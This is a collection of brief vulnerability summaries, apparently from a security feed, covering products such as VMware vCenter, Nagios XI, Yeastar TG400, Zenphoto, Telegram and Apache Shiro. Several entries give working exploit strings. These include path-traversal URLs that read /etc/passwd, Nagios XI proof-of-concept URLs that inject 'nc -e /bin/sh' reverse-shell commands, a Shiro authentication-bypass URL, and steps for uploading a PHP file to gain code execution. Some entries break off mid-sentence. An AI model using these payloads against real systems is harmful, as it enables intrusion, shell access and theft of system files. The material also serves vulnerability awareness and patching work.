VMware vCenter Server vSphere Client remote code execution. Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy-to-exploit vulnerability, so future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3. To get the firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/passwd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= Payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_spee

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024;%20nc%20-e%20/bin/sh%20127.0.0.1%204444;&submitButton2= payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local passcode in plain text. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local copy of received messages (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

Authenticated arbitrary file upload to RCE
Product: Zenphoto
Affected: Zenphoto CMS - <= 1.5.7
Attack Type: Remote
Log in, then go to plugins, then go to uploader and check the elFinder box, then press apply. After that, go to upload, then Files(elFinder), and drag and drop any malicious PHP code. After that, go to /uploaded/ and your PHP code
Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder)

Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. This zero-day is a new vulnerability which is caused by a win32k callback; it could be used to escape the sandbox of the Microsoft IE browser or Adobe Reader on the latest Windows 10 version. The quality of this vulnerability is high and the exploit is sophisticated. The use of this in-the-wild zero-day reflects the organization’s strong vulnerability reserve capability. The threat organization may have recruited members with certain strength, or bought it from vulnerability brokers. The in-the-wild zero-day: 1. It

Apache Shiro very easy-to-exploit authentication bypass vulnerability. Use blank characters such as spaces to bypass Shiro authentication: http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/ https://github.com/jweny/shiro-cve-2020-17523